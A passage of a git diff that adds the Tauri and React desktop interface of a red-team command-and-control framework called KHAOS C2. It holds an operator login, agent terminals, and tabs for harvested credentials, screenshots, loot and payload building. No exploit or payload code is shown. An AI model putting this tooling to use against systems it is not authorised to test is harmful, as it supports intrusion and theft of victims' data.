b/ui/src-tauri/icons/Square284x284Logo.png differ diff --git a/ui/src-tauri/icons/Square30x30Logo.png b/ui/src-tauri/icons/Square30x30Logo.png new file mode 100644 index 0000000..d39c1ec Binary files /dev/null and b/ui/src-tauri/icons/Square30x30Logo.png differ diff --git a/ui/src-tauri/icons/Square310x310Logo.png b/ui/src-tauri/icons/Square310x310Logo.png new file mode 100644 index 0000000..58f0da7 Binary files /dev/null and b/ui/src-tauri/icons/Square310x310Logo.png differ diff --git a/ui/src-tauri/icons/Square44x44Logo.png b/ui/src-tauri/icons/Square44x44Logo.png new file mode 100644 index 0000000..36cd0ae Binary files /dev/null and b/ui/src-tauri/icons/Square44x44Logo.png differ diff --git a/ui/src-tauri/icons/Square71x71Logo.png b/ui/src-tauri/icons/Square71x71Logo.png new file mode 100644 index 0000000..f18ae56 Binary files /dev/null and b/ui/src-tauri/icons/Square71x71Logo.png differ diff --git a/ui/src-tauri/icons/Square89x89Logo.png b/ui/src-tauri/icons/Square89x89Logo.png new file mode 100644 index 0000000..70a5eda Binary files /dev/null and b/ui/src-tauri/icons/Square89x89Logo.png differ diff --git a/ui/src-tauri/icons/StoreLogo.png b/ui/src-tauri/icons/StoreLogo.png new file mode 100644 index 0000000..69f40fa Binary files /dev/null and b/ui/src-tauri/icons/StoreLogo.png differ diff --git a/ui/src-tauri/icons/android/mipmap-anydpi-v26/ic_launcher.xml b/ui/src-tauri/icons/android/mipmap-anydpi-v26/ic_launcher.xml new file mode 100644 index 0000000..2ffbf24 --- /dev/null +++ b/ui/src-tauri/icons/android/mipmap-anydpi-v26/ic_launcher.xml @@ -0,0 +1,5 @@ + + + + + \ No newline at end of file diff --git a/ui/src-tauri/icons/android/mipmap-hdpi/ic_launcher.png b/ui/src-tauri/icons/android/mipmap-hdpi/ic_launcher.png new file mode 100644 index 0000000..9fe45d1 Binary files /dev/null and b/ui/src-tauri/icons/android/mipmap-hdpi/ic_launcher.png differ diff --git a/ui/src-tauri/icons/android/mipmap-hdpi/ic_launcher_foreground.png b/ui/src-tauri/icons/android/mipmap-hdpi/ic_launcher_foreground.png new file mode 100644 index 0000000..3e1a215 Binary files /dev/null and b/ui/src-tauri/icons/android/mipmap-hdpi/ic_launcher_foreground.png differ diff --git a/ui/src-tauri/icons/android/mipmap-hdpi/ic_launcher_round.png b/ui/src-tauri/icons/android/mipmap-hdpi/ic_launcher_round.png new file mode 100644 index 0000000..d9be0e9 Binary files /dev/null and b/ui/src-tauri/icons/android/mipmap-hdpi/ic_launcher_round.png differ diff --git a/ui/src-tauri/icons/android/mipmap-mdpi/ic_launcher.png b/ui/src-tauri/icons/android/mipmap-mdpi/ic_launcher.png new file mode 100644 index 0000000..e328124 Binary files /dev/null and b/ui/src-tauri/icons/android/mipmap-mdpi/ic_launcher.png differ diff --git a/ui/src-tauri/icons/android/mipmap-mdpi/ic_launcher_foreground.png b/ui/src-tauri/icons/android/mipmap-mdpi/ic_launcher_foreground.png new file mode 100644 index 0000000..0781269 Binary files /dev/null and b/ui/src-tauri/icons/android/mipmap-mdpi/ic_launcher_foreground.png differ diff --git a/ui/src-tauri/icons/android/mipmap-mdpi/ic_launcher_round.png b/ui/src-tauri/icons/android/mipmap-mdpi/ic_launcher_round.png new file mode 100644 index 0000000..048cc24 Binary files /dev/null and b/ui/src-tauri/icons/android/mipmap-mdpi/ic_launcher_round.png differ diff --git a/ui/src-tauri/icons/android/mipmap-xhdpi/ic_launcher.png b/ui/src-tauri/icons/android/mipmap-xhdpi/ic_launcher.png new file mode 100644 index 0000000..3eef46f Binary files /dev/null and b/ui/src-tauri/icons/android/mipmap-xhdpi/ic_launcher.png differ diff --git a/ui/src-tauri/icons/android/mipmap-xhdpi/ic_launcher_foreground.png b/ui/src-tauri/icons/android/mipmap-xhdpi/ic_launcher_foreground.png new file mode 100644 index 0000000..c036457 Binary files /dev/null and b/ui/src-tauri/icons/android/mipmap-xhdpi/ic_launcher_foreground.png differ diff --git a/ui/src-tauri/icons/android/mipmap-xhdpi/ic_launcher_round.png b/ui/src-tauri/icons/android/mipmap-xhdpi/ic_launcher_round.png new file mode 100644 index 0000000..87a55c4 Binary files /dev/null and b/ui/src-tauri/icons/android/mipmap-xhdpi/ic_launcher_round.png differ diff --git a/ui/src-tauri/icons/android/mipmap-xxhdpi/ic_launcher.png b/ui/src-tauri/icons/android/mipmap-xxhdpi/ic_launcher.png new file mode 100644 index 0000000..57357b6 Binary files /dev/null and b/ui/src-tauri/icons/android/mipmap-xxhdpi/ic_launcher.png differ diff --git a/ui/src-tauri/icons/android/mipmap-xxhdpi/ic_launcher_foreground.png b/ui/src-tauri/icons/android/mipmap-xxhdpi/ic_launcher_foreground.png new file mode 100644 index 0000000..006c8f8 Binary files /dev/null and b/ui/src-tauri/icons/android/mipmap-xxhdpi/ic_launcher_foreground.png differ diff --git a/ui/src-tauri/icons/android/mipmap-xxhdpi/ic_launcher_round.png b/ui/src-tauri/icons/android/mipmap-xxhdpi/ic_launcher_round.png new file mode 100644 index 0000000..0268ade Binary files /dev/null and b/ui/src-tauri/icons/android/mipmap-xxhdpi/ic_launcher_round.png differ diff --git a/ui/src-tauri/icons/android/mipmap-xxxhdpi/ic_launcher.png b/ui/src-tauri/icons/android/mipmap-xxxhdpi/ic_launcher.png new file mode 100644 index 0000000..5aa4207 Binary files /dev/null and b/ui/src-tauri/icons/android/mipmap-xxxhdpi/ic_launcher.png differ diff --git a/ui/src-tauri/icons/android/mipmap-xxxhdpi/ic_launcher_foreground.png b/ui/src-tauri/icons/android/mipmap-xxxhdpi/ic_launcher_foreground.png new file mode 100644 index 0000000..f303b83 Binary files /dev/null and b/ui/src-tauri/icons/android/mipmap-xxxhdpi/ic_launcher_foreground.png differ diff --git a/ui/src-tauri/icons/android/mipmap-xxxhdpi/ic_launcher_round.png b/ui/src-tauri/icons/android/mipmap-xxxhdpi/ic_launcher_round.png new file mode 100644 index 0000000..ed512a7 Binary files /dev/null and b/ui/src-tauri/icons/android/mipmap-xxxhdpi/ic_launcher_round.png differ diff --git a/ui/src-tauri/icons/android/values/ic_launcher_background.xml b/ui/src-tauri/icons/android/values/ic_launcher_background.xml new file mode 100644 index 0000000..ea9c223 --- /dev/null +++ b/ui/src-tauri/icons/android/values/ic_launcher_background.xml @@ -0,0 +1,4 @@ + + + #fff + \ No newline at end of file diff --git a/ui/src-tauri/icons/icon.icns b/ui/src-tauri/icons/icon.icns new file mode 100644 index 0000000..e74ad5a Binary files /dev/null and b/ui/src-tauri/icons/icon.icns differ diff --git a/ui/src-tauri/icons/icon.ico b/ui/src-tauri/icons/icon.ico new file mode 100644 index 0000000..88ccfd2 Binary files /dev/null and b/ui/src-tauri/icons/icon.ico differ diff --git a/ui/src-tauri/icons/icon.png b/ui/src-tauri/icons/icon.png new file mode 100644 index 0000000..52a90d2 Binary files /dev/null and b/ui/src-tauri/icons/icon.png differ diff --git a/ui/src-tauri/icons/ios/AppIcon-20x20@1x.png b/ui/src-tauri/icons/ios/AppIcon-20x20@1x.png new file mode 100644 index 0000000..f2752b6 Binary files /dev/null and b/ui/src-tauri/icons/ios/AppIcon-20x20@1x.png differ diff --git a/ui/src-tauri/icons/ios/AppIcon-20x20@2x-1.png b/ui/src-tauri/icons/ios/AppIcon-20x20@2x-1.png new file mode 100644 index 0000000..1027ff8 Binary files /dev/null and b/ui/src-tauri/icons/ios/AppIcon-20x20@2x-1.png differ diff --git a/ui/src-tauri/icons/ios/AppIcon-20x20@2x.png b/ui/src-tauri/icons/ios/AppIcon-20x20@2x.png new file mode 100644 index 0000000..1027ff8 Binary files /dev/null and b/ui/src-tauri/icons/ios/AppIcon-20x20@2x.png differ diff --git a/ui/src-tauri/icons/ios/AppIcon-20x20@3x.png b/ui/src-tauri/icons/ios/AppIcon-20x20@3x.png new file mode 100644 index 0000000..e2a0100 Binary files /dev/null and b/ui/src-tauri/icons/ios/AppIcon-20x20@3x.png differ diff --git a/ui/src-tauri/icons/ios/AppIcon-29x29@1x.png b/ui/src-tauri/icons/ios/AppIcon-29x29@1x.png new file mode 100644 index 0000000..a6a05bd Binary files /dev/null and b/ui/src-tauri/icons/ios/AppIcon-29x29@1x.png differ diff --git a/ui/src-tauri/icons/ios/AppIcon-29x29@2x-1.png b/ui/src-tauri/icons/ios/AppIcon-29x29@2x-1.png new file mode 100644 index 0000000..306291f Binary files /dev/null and b/ui/src-tauri/icons/ios/AppIcon-29x29@2x-1.png differ diff --git a/ui/src-tauri/icons/ios/AppIcon-29x29@2x.png b/ui/src-tauri/icons/ios/AppIcon-29x29@2x.png new file mode 100644 index 0000000..306291f Binary files /dev/null and b/ui/src-tauri/icons/ios/AppIcon-29x29@2x.png differ diff --git a/ui/src-tauri/icons/ios/AppIcon-29x29@3x.png b/ui/src-tauri/icons/ios/AppIcon-29x29@3x.png new file mode 100644 index 0000000..f3c1659 Binary files /dev/null and b/ui/src-tauri/icons/ios/AppIcon-29x29@3x.png differ diff --git a/ui/src-tauri/icons/ios/AppIcon-40x40@1x.png b/ui/src-tauri/icons/ios/AppIcon-40x40@1x.png new file mode 100644 index 0000000..1027ff8 Binary files /dev/null and b/ui/src-tauri/icons/ios/AppIcon-40x40@1x.png differ diff --git a/ui/src-tauri/icons/ios/AppIcon-40x40@2x-1.png b/ui/src-tauri/icons/ios/AppIcon-40x40@2x-1.png new file mode 100644 index 0000000..dcd7a04 Binary files /dev/null and b/ui/src-tauri/icons/ios/AppIcon-40x40@2x-1.png differ diff --git a/ui/src-tauri/icons/ios/AppIcon-40x40@2x.png b/ui/src-tauri/icons/ios/AppIcon-40x40@2x.png new file mode 100644 index 0000000..dcd7a04 Binary files /dev/null and b/ui/src-tauri/icons/ios/AppIcon-40x40@2x.png differ diff --git a/ui/src-tauri/icons/ios/AppIcon-40x40@3x.png b/ui/src-tauri/icons/ios/AppIcon-40x40@3x.png new file mode 100644 index 0000000..ba16aa0 Binary files /dev/null and b/ui/src-tauri/icons/ios/AppIcon-40x40@3x.png differ diff --git a/ui/src-tauri/icons/ios/AppIcon-512@2x.png b/ui/src-tauri/icons/ios/AppIcon-512@2x.png new file mode 100644 index 0000000..0802202 Binary files /dev/null and b/ui/src-tauri/icons/ios/AppIcon-512@2x.png differ diff --git a/ui/src-tauri/icons/ios/AppIcon-60x60@2x.png b/ui/src-tauri/icons/ios/AppIcon-60x60@2x.png new file mode 100644 index 0000000..ba16aa0 Binary files /dev/null and b/ui/src-tauri/icons/ios/AppIcon-60x60@2x.png differ diff --git a/ui/src-tauri/icons/ios/AppIcon-60x60@3x.png b/ui/src-tauri/icons/ios/AppIcon-60x60@3x.png new file mode 100644 index 0000000..02da11c Binary files /dev/null and b/ui/src-tauri/icons/ios/AppIcon-60x60@3x.png differ diff --git a/ui/src-tauri/icons/ios/AppIcon-76x76@1x.png b/ui/src-tauri/icons/ios/AppIcon-76x76@1x.png new file mode 100644 index 0000000..2887a75 Binary files /dev/null and b/ui/src-tauri/icons/ios/AppIcon-76x76@1x.png differ diff --git a/ui/src-tauri/icons/ios/AppIcon-76x76@2x.png b/ui/src-tauri/icons/ios/AppIcon-76x76@2x.png new file mode 100644 index 0000000..5aa2247 Binary files /dev/null and b/ui/src-tauri/icons/ios/AppIcon-76x76@2x.png differ diff --git a/ui/src-tauri/icons/ios/AppIcon-83.5x83.5@2x.png b/ui/src-tauri/icons/ios/AppIcon-83.5x83.5@2x.png new file mode 100644 index 0000000..4ebf4ad Binary files /dev/null and b/ui/src-tauri/icons/ios/AppIcon-83.5x83.5@2x.png differ diff --git a/ui/src-tauri/src/lib.rs b/ui/src-tauri/src/lib.rs new file mode 100644 index 0000000..b4fcb5c --- /dev/null +++ b/ui/src-tauri/src/lib.rs @@ -0,0 +1,89 @@ +use discord_rich_presence::{activity, DiscordIpc, DiscordIpcClient}; +use std::process::{Child, Command}; +use std::sync::Mutex; + +const DISCORD_APP_ID: &str = "1504801899222794282"; + +static SERVER: Mutex> = Mutex::new(None); + +fn start_server() { + let exe_dir = std::env::current_exe() + .ok() + .and_then(|p| p.parent().map(|p| p.to_path_buf())) + .unwrap_or_default(); + + #[cfg(target_os = "windows")] + let server_exe = exe_dir.join("khaos-server.exe"); + #[cfg(not(target_os = "windows"))] + let server_exe = exe_dir.join("khaos-server"); + + if !server_exe.exists() { + return; + } + + match Command::new(&server_exe).spawn() { + Ok(child) => { *SERVER.lock().unwrap() = Some(child); } + Err(e) => { eprintln!("[KHAOS] Failed to start server: {e}"); } + } +} + +fn stop_server() { + if let Ok(mut g) = SERVER.lock() { + if let Some(mut child) = g.take() { + let _ = child.kill(); + } + } +} + +fn start_discord_rpc() { + std::thread::spawn(|| { + let mut client = DiscordIpcClient::new(DISCORD_APP_ID); + + // Retry connect loop (Discord peut ne pas être lancé tout de suite) + loop { + if client.connect().is_ok() { + break; + } + std::thread::sleep(std::time::Duration::from_secs(5)); + } + + let now = std::time::SystemTime::now() + .duration_since(std::time::UNIX_EPOCH) + .unwrap_or_default() + .as_secs() as i64; + + let activity = activity::Activity::new() + .state("github.com/khaos-c2") + .details("KHAOS Framework") + .timestamps(activity::Timestamps::new().start(now)) + .assets( + activity::Assets::new() + .large_image("khaos_logo") + .large_text("KHAOS C2 — Red Team Framework") + .small_image("khaos_logo") + .small_text("v1.0"), + ); + + let _ = client.set_activity(activity); + + // Maintenir la connexion RPC vivante + loop { + std::thread::sleep(std::time::Duration::from_secs(15)); + } + }); +} + +#[cfg_attr(mobile, tauri::mobile_entry_point)] +pub fn run() { + start_discord_rpc(); + start_server(); + + tauri::Builder::default() + .on_window_event(|_window, event| { + if let tauri::WindowEvent::Destroyed = event { + stop_server(); + } + }) + .run(tauri::generate_context!()) + .expect("failed to start KHAOS C2"); +} diff --git a/ui/src-tauri/src/main.rs b/ui/src-tauri/src/main.rs new file mode 100644 index 0000000..5412caf --- /dev/null +++ b/ui/src-tauri/src/main.rs @@ -0,0 +1,6 @@ +// Tauri desktop entry — hides the console window in release builds +#![cfg_attr(not(debug_assertions), windows_subsystem = "windows")] + +fn main() { + khaos_c2_lib::run(); +} \ No newline at end of file diff --git a/ui/src-tauri/tauri.conf.json b/ui/src-tauri/tauri.conf.json new file mode 100644 index 0000000..5ddd500 --- /dev/null +++ b/ui/src-tauri/tauri.conf.json @@ -0,0 +1,43 @@ +{ + "$schema": "../node_modules/@tauri-apps/cli/schema.json", + "productName": "KHAOS FRAMEWORK", + "version": "1.0.0", + "identifier": "fr.khaotic.c2", + "build": { + "frontendDist": "../dist", + "devUrl": "http://localhost:3000", + "beforeDevCommand": "npm run dev -- --port 3000", + "beforeBuildCommand": "npm run build" + }, + "app": { + "windows": [ + { + "title": "KHAOS FRAMEWORK", + "width": 1400, + "height": 900, + "minWidth": 1024, + "minHeight": 600, + "resizable": true, + "fullscreen": false, + "decorations": true + } + ], + "security": { + "csp": "default-src 'self'; script-src 'self' 'unsafe-inline'; style-src 'self' 'unsafe-inline' https://fonts.googleapis.com; font-src 'self' https://fonts.gstatic.com; connect-src 'self' http://localhost:8000 ws://localhost:8000; img-src 'self' data: blob:" + } + }, + "bundle": { + "active": true, + "targets": "all", + "externalBin": ["binaries/khaos-server"], + "icon": [ + "icons/32x32.png", + "icons/64x64.png", + "icons/128x128.png", + "icons/128x128@2x.png", + "icons/icon.png", + "icons/icon.icns", + "icons/icon.ico" + ] + } +} diff --git a/ui/src/App.jsx b/ui/src/App.jsx new file mode 100644 index 0000000..d1d59bb --- /dev/null +++ b/ui/src/App.jsx @@ -0,0 +1,1247 @@ +import { useState, useRef, useEffect, useCallback, useMemo } from "react"; +import useAgentStore from "./store/useAgentStore"; +import Dashboard from "./components/Dashboard"; +import Terminal from "./components/Terminal"; +import Tasks from "./components/Tasks"; +import Logs from "./components/Logs"; +import FileManager from "./components/FileManager"; +import CommandPalette from "./components/CommandPalette"; +import DetailPanel from "./components/DetailPanel"; +import ToastContainer from "./components/Toast"; +import Users from "./components/Users"; +import Build from "./components/Build"; +import Creds from "./components/Creds"; +import Screenshots from "./components/Screenshots"; +import Loot from "./components/Loot"; +import NetworkMap from "./components/NetworkMap"; + +function decodeJwtPayload(token) { + try { + return JSON.parse(atob(token.split(".")[1])); + } catch { + return {}; + } +} + +/* ─────────────────────────── Global CSS ─────────────────────────── */ +const GLOBAL_CSS = ` +@import url('https://fonts.googleapis.com/css2?family=Share+Tech+Mono&display=swap'); +*, *::before, *::after { box-sizing: border-box; margin: 0; padding: 0; } +html, body, #root { height: 100%; overflow: hidden; } +body { + background: #0a0a0a; + color: #dde1e8; + font-family: 'Share Tech Mono', 'Consolas', monospace; + font-size: 13px; + -webkit-font-smoothing: antialiased; +} +::-webkit-scrollbar { width: 4px; height: 4px; } +::-webkit-scrollbar-track { background: #0a0a0a; } +::-webkit-scrollbar-thumb { background: #1e1e1e; border-radius: 2px; } +::-webkit-scrollbar-thumb:hover { background: #2a2a2a; } + +@keyframes pulse { 0%,100%{opacity:1} 50%{opacity:.3} } +@keyframes blink { 0%,100%{opacity:1} 50%{opacity:0} } +@keyframes dot-pulse { 0%,100%{box-shadow:0 0 4px currentColor} 50%{box-shadow:0 0 12px currentColor} } + +/* ── Layout helpers ── */ +.resize-handle { + width: 4px; flex-shrink: 0; cursor: col-resize; + background: transparent; transition: background .15s; z-index: 10; +} +.resize-handle:hover, .resize-handle.dragging { background: #ff3131; } + +/* ── Agent rows ── */ +.agent-row { cursor: pointer; transition: background .1s; } +.agent-row:hover { background: #130a0a !important; } +.agent-row.selected { background: #1c0808 !important; } + +/* ── Tab buttons ── */ +.tab-btn { + transition: color .1s, border-color .1s; + border-bottom: 2px solid transparent !important; +} +.tab-btn:hover { color: #dde1e8 !important; } +.tab-btn.active { color: #ff3131 !important; border-bottom-color: #ff3131 !important; } + +/* ── Console tabs ── */ +.c-tab { + display: flex; align-items: center; gap: 6px; + padding: 0 14px; height: 100%; cursor: pointer; + border-right: 1px solid #1e1e1e; + font-size: 11px; color: #888888; letter-spacing: 0.5px; + transition: color .1s, background .1s; + white-space: nowrap; max-width: 180px; + position: relative; flex-shrink: 0; +} +.c-tab:hover { background: #130a0a; color: #dde1e8; } +.c-tab.active { color: #ff3131; background: #0a0a0a; border-bottom: 2px solid #ff3131; } +.c-tab .c-close { + opacity: 0; transition: opacity .1s; + background: transparent; border: none; color: #888888; + cursor: pointer; font-size: 12px; padding: 0 0 0 2px; line-height: 1; +} +.c-tab:hover .c-close { opacity: 1; } +.c-tab .c-close:hover { color: #f85149; } + +/* ── Hover rows (tasks / logs) ── */ +.hover-row { transition: background .08s; cursor: default; } +.hover-row:hover { background: #111111 !important; } +.hover-row.clickable { cursor: pointer; } + +/* ── Buttons ── */ +.k-btn { transition: all .12s; cursor: pointer; } +.k-btn:hover:not(:disabled) { filter: brightness(1.15); } +.k-btn-outline:hover:not(:disabled) { background: #ff3131 !important; color: #0a0a0a !important; } +.k-btn-ghost:hover { background: #1e1e1e !important; color: #dde1e8 !important; } + +/* ── Context menu ── */ +.ctx-menu { user-select: none; } +.ctx-item { + cursor: pointer; padding: 8px 16px; font-size: 11px; + color: #888888; letter-spacing: 1px; transition: background .08s, color .08s; +} +.ctx-item:hover { background: #1e1e1e; color: #dde1e8; } +.ctx-item.sep { border-top: 1px solid #1e1e1e; margin-top: 4px; padding-top: 11px; } +.ctx-item.danger { color: #f85149; } +.ctx-item.danger:hover { background: #2d1818; } + +/* ── Status badges ── */ +.badge { + display: inline-flex; align-items: center; gap: 3px; + padding: 2px 7px; font-size: 10px; letter-spacing: 1.5px; font-weight: 700; +} +.badge-green { background: #0d1f14; color: #3fb950; border: 1px solid #1a3d24; } +.badge-red { background: #2a1414; color: #f85149; border: 1px solid #5c2020; } +.badge-yellow { background: #231a0a; color: #d29922; border: 1px solid #4a3412; } +.badge-gray { background: #111111; color: #888888; border: 1px solid #1e1e1e; } + +/* ── Inputs ── */ +.k-input { + background: #0a0a0a; border: 1px solid #1e1e1e; color: #dde1e8; + font-family: inherit; font-size: 12px; padding: 7px 10px; outline: none; + transition: border-color .1s; width: 100%; +} +.k-input:focus { border-color: #ff313166; } +.k-input::placeholder { color: #888888; } + +/* ── Separator ── */ +.k-sep { border: none; border-top: 1px solid #1e1e1e; margin: 8px 0; } + +/* ── Scrollable area ── */ +.scroll { overflow-y: auto; overflow-x: hidden; } +`; + +/* ─────────────────────────── Logo ─────────────────────────── */ +function Logo({ size = 16 }) { + return ( + + KHA + Ø + S + + + + C2 + + ); +} + +/* ─────────────────────────── Login ─────────────────────────── */ +function Login() { + const { login, authError } = useAgentStore(); + const [u, setU] = useState(""); + const [p, setP] = useState(""); + const [loading, setLoading] = useState(false); + + const submit = async (e) => { + e.preventDefault(); + setLoading(true); + await login(u, p); + setLoading(false); + }; + + return ( +
+
+
+ +
+
+
+
+ OPERATOR + setU(e.target.value)} + autoFocus + autoComplete="off" + style={{ + borderLeft: "none", + borderTop: "none", + borderRight: "none", + }} + /> +
+
+ PASSWORD + setP(e.target.value)} + style={{ + borderLeft: "none", + borderTop: "none", + borderRight: "none", + }} + /> +
+ {authError && ( +

+ // {authError.toUpperCase()} // +

+ )} + +
+
+
+ ); +} + +const l = { + wrap: { + display: "flex", + alignItems: "center", + justifyContent: "center", + minHeight: "100vh", + background: "#0a0a0a", + backgroundImage: + "radial-gradient(ellipse at center, #180606 0%, #0a0a0a 60%)", + }, + box: { + width: 360, + background: "#111111", + border: "1px solid #888888", + boxShadow: "0 0 60px rgba(255,49,49,.10)", + padding: "40px 32px", + }, + divider: { + height: 1, + background: "linear-gradient(90deg,transparent,#ff3131,transparent)", + marginBottom: 24, + }, + field: { + display: "flex", + alignItems: "center", + borderBottom: "1px solid #1e1e1e", + }, + pfx: { + fontSize: 11, + color: "#888888", + letterSpacing: 2, + minWidth: 80, + flexShrink: 0, + padding: "0 8px", + }, +}; + +/* ─────────────────────────── Console tab button ─────────────────────────── */ +function ConsoleTab({ agent, active, onSelect, onClose }) { + const { sendingTask, lastAckedTask } = useAgentStore(); + // A task is running for this agent if sendingTask is true and lastAckedTask doesn't belong to this agent yet + const isRunning = + sendingTask && + (!lastAckedTask || lastAckedTask.agent_id === agent.agent_id); + return ( +
+ + ● + + + {agent.agent_id} + + {isRunning && ( + + RUN + + )} + +
+ ); +} + +/* ─────────────────────────── Main Shell ─────────────────────────── */ +const BASE_TABS = [ + { id: "TERMINAL", icon: "⌨", label: "TERMINAL" }, + { id: "TASKS", icon: "◈", label: "TASKS" }, + { id: "FILES", icon: "⇅", label: "FILES" }, + { id: "LOGS", icon: "≡", label: "LOGS" }, + { id: "CREDS", icon: "⊛", label: "CREDS" }, + { id: "SHOTS", icon: "⊡", label: "SHOTS" }, + { id: "LOOT", icon: "◉", label: "LOOT" }, + { id: "MAP", icon: "◎", label: "MAP" }, +]; + +export default function App() { + const { + token, + logout, + selectedAgent, + agents, + connectWS, + wsConnected, + consoleTabs, + closeConsoleTab, + sendTask, + killAll, + addToast, + agentAliases, + setAgentAlias, + clearAgentAlias, + clearMultiSelect, + } = useAgentStore(); + + const jwtPayload = useMemo( + () => (token ? decodeJwtPayload(token) : {}), + [token], + ); + const isAdmin = jwtPayload.role === "admin"; + const TABS = useMemo( + () => + isAdmin + ? [ + ...BASE_TABS, + { id: "BUILD", icon: "⬡", label: "BUILD" }, + { id: "USERS", icon: "☰", label: "USERS" }, + ] + : BASE_TABS, + [isAdmin], + ); + const [tab, setTab] = useState("TERMINAL"); + const [showPalette, setShowPalette] = useState(false); + const [showDetail, setShowDetail] = useState(true); + const [clock, setClock] = useState(""); + const [killConfirm, setKillConfirm] = useState(false); + + /* ── Terminal slots (solo · hsplit · quad) ── */ + const [termSlots, setTermSlots] = useState({}) // slot → agentId + const [dragTab, setDragTab] = useState(null) // agentId en cours de drag + const prevTabIdsRef = useRef(new Set()) + const [renameTarget, setRenameTarget] = useState(null) + const [renameValue, setRenameValue] = useState('') + const termSlotsRef = useRef({}) // toujours à jour sans dépendance d'effet + useEffect(() => { termSlotsRef.current = termSlots }, [termSlots]) + + // Auto-solo nouvel agent; purge les agents fermés des slots + useEffect(() => { + const currentIds = new Set(consoleTabs.map(a => a.agent_id)) + let newId = null + consoleTabs.forEach(a => { if (!prevTabIdsRef.current.has(a.agent_id)) newId = a.agent_id }) + prevTabIdsRef.current = currentIds + setTermSlots(prev => { + if (newId) return { full: newId } + const cleaned = {} + for (const [k, v] of Object.entries(prev)) { if (v && currentIds.has(v)) cleaned[k] = v } + const same = Object.keys(cleaned).length === Object.keys(prev).length && + Object.entries(cleaned).every(([k, v]) => prev[k] === v) + return same ? prev : cleaned + }) + }, [consoleTabs]) + + // Clic sur chip = toujours solo (toggle si déjà solo) + sélectionne l'agent + const clickTabChip = useCallback((agentId) => { + setTermSlots(prev => { + const isSolo = getTermLayout(prev) === 'solo' && prev.full === agentId + return isSolo ? {} : { full: agentId } + }) + // Mettre à jour selectedAgent pour que DetailPanel etc. soient synchros + const agent = useAgentStore.getState().agents.find(a => a.agent_id === agentId) + if (agent) useAgentStore.getState().selectAgent(agent) + }, []) + + // Dépôt sur une zone snap (drag ou raccourci clavier) + const snapToZone = useCallback((agentId, zone) => { + setTermSlots(prev => { + if (zone === 'full') return { full: agentId } + if (zone === 'left' || zone === 'right') { + const other = zone === 'left' ? 'right' : 'left' + const otherAgent = prev[other] || prev.full || prev.tl || prev.tr || prev.bl || prev.br + const result = { [zone]: agentId } + if (otherAgent && otherAgent !== agentId) result[other] = otherAgent + return result + } + const q = {} + for (const s of ['tl','tr','bl','br']) { if (prev[s] && prev[s] !== agentId) q[s] = prev[s] } + for (const src of [prev.left, prev.right, prev.full]) { + if (src && src !== agentId && !Object.values(q).includes(src)) { + const fs = ['tl','tr','bl','br'].find(s => !q[s]); if (fs) q[fs] = src + } + } + q[zone] = agentId + return q + }) + }, []) + + // Dépôt sur une zone snap (drag) + const dropToZone = useCallback((zone) => { + snapToZone(dragTab, zone) + setDragTab(null) + }, [dragTab, snapToZone]) + + // Cache un slot (garde consoletab) + const hideSlot = useCallback((slot) => { + setTermSlots(prev => { + const next = { ...prev }; delete next[slot] + const rem = Object.entries(next).filter(([, v]) => v) + if (rem.length === 1) return { full: rem[0][1] } + return next + }) + }, []) + + // Ferme un slot + consoletab + const closeSlot = useCallback((slot, agentId) => { + hideSlot(slot); if (agentId) closeConsoleTab(agentId) + }, [hideSlot, closeConsoleTab]) + + useEffect(() => { + const tick = () => { + const now = new Date(); + setClock(now.toUTCString().slice(17, 25) + " UTC"); + }; + tick(); + const id = setInterval(tick, 1000); + return () => clearInterval(id); + }, []); + + /* ── Init WS on load ── */ + useEffect(() => { + if (token) connectWS(); + }, [token]); + + /* ── Periodic agent refresh — fallback if WS misses agent_lost/agent_seen ── */ + useEffect(() => { + if (!token) return; + const { fetchAgents } = useAgentStore.getState(); + fetchAgents(); + const id = setInterval(() => useAgentStore.getState().fetchAgents(), 30000); + return () => clearInterval(id); + }, [token]); + + /* ── Keyboard shortcuts ── */ + useEffect(() => { + const onKey = (e) => { + const t = e.target; + const inInput = t.tagName === "INPUT" || t.tagName === "TEXTAREA" || t.closest?.(".xterm"); + + /* Ctrl/Cmd+K — command palette */ + if (e.key === "k" && (e.ctrlKey || e.metaKey) && !e.shiftKey && !e.altKey) { + e.preventDefault(); + if (!inInput) setShowPalette((p) => !p); + return; + } + + /* ] — toggle detail panel */ + if (e.key === "]" && !e.ctrlKey && !e.altKey && !e.metaKey) { + if (!inInput) setShowDetail((p) => !p); + return; + } + + /* Escape — close palette */ + if (e.key === "Escape" && !inInput) { + setShowPalette(false); + } + }; + window.addEventListener("keydown", onKey); + return () => window.removeEventListener("keydown", onKey); + }, [isAdmin]); + + /* ── Raccourcis split terminal (Ctrl+flèches) ── + Conditions : un agent est shift-sélectionné dans la sidebar + ET au moins une fenêtre terminal est déjà ouverte + Ctrl+← → Ctrl+← = ½ gauche Ctrl+← → Ctrl+↑ = ¼ haut-gauche + Ctrl+→ → Ctrl+→ = ½ droite Ctrl+→ → Ctrl+↓ = ¼ bas-droite + Ctrl+↑ (seul) = solo agent sélectionné */ + const chordDir = useRef(null) + const chordTimeout = useRef(null) + const [chordHint, setChordHint] = useState(null) + + useEffect(() => { + const onKey = (e) => { + if (!e.ctrlKey || e.altKey || e.metaKey) return + if (!['ArrowLeft','ArrowRight','ArrowUp','ArrowDown'].includes(e.key)) return + const t = document.activeElement + if (t?.closest?.('.xterm') || t?.tagName === 'INPUT' || t?.tagName === 'TEXTAREA') return + + // Ctrl+↑ sans chord : solo de l’agent sélectionné, toujours disponible + if (e.key === 'ArrowUp' && !chordDir.current) { + e.preventDefault() + const agent = useAgentStore.getState().selectedAgent + if (agent) { clearTimeout(chordTimeout.current); chordDir.current = null; setChordHint(null); snapToZone(agent.agent_id, 'full') } + return + } + + // Pour les splits : vérifier conditions + const ms = useAgentStore.getState().multiSelect + const slots = termSlotsRef.current + if (ms.size === 0 || Object.keys(slots).length === 0) return + + e.preventDefault() + + // Agent à placer : le 1er shift-sélectionné pas encore dans un slot + const placedIds = Object.values(slots) + const agentId = [...ms].find(id => !placedIds.includes(id)) ?? [...ms][0] + + const commit = (zone) => { + clearTimeout(chordTimeout.current) + chordDir.current = null + setChordHint(null) + snapToZone(agentId, zone) + useAgentStore.getState().clearMultiSelect() + if (tab !== 'TERMINAL') setTab('TERMINAL') + } + + if (e.key === 'ArrowLeft' || e.key === 'ArrowRight') { + const dir = e.key === 'ArrowRight' ? 'right' : 'left' + if (chordDir.current === dir) { + commit(dir) + } else { + clearTimeout(chordTimeout.current) + chordDir.current = dir + setChordHint(dir) + chordTimeout.current = setTimeout(() => { + const msNow = useAgentStore.getState().multiSelect + const slotsNow = termSlotsRef.current + if (msNow.size > 0 && 